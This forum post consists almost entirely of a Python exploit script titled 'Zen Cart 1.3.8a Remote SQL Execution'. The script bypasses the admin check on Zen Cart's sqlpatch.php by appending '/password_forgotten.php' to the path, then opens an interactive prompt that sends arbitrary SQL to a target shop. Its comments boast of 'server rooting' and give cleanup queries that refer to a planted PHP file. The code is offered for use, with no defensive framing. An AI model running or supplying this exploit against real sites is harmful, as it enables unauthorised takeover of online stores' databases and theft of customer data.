Jump to content
hozarares

Zen Cart 1.3.8a Remote SQL Execution

Recommended Posts

Posted

#!/usr/bin/python

#

# ------- Zen Cart 1.3.8a Remote SQL Execution

# ecommerce shopping cart software by Zen Cart ecommerce solution

# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!

# The new version (1.3.8a) : ecommerce shopping cart software by Zen Cart ecommerce solution

#

# 33333333333 :)

#

#

# Notes: must have admin/sqlpatch.php enabled

#

# clean the database :

# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);

# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):

global a, b

for param in sys.argv:

if(param == '-'+name): return str(sys.argv[b+1])

b = b + 1

if(need):

print '\n#error', "-"+name, 'parameter required'

exit(1)

if (len(sys.argv) < 2):

print """

=____________ Zen Cart 1.3.8a Remote SQL Execution Exploit ____________=

========================================================================

| 3333333333333333333 |

========================================================================

| |

| $system> python """+sys.argv[0]+""" -url <url> |

| Param: <url> ex: http://victim.com/site (no slash) |

| |

| Note: blind "injection" |

========================================================================

"""

exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:

cmd = raw_input('sql@jah$ ')

if (cmd == "exit"): exit(1)

req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))

if (re.findall('1 statements processed',urllib2.urlopen(req).read())):

print '>> success (', cmd, ")"

else:

print '>> failed, be sure to end with ; (', cmd, ")"

  • Downvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...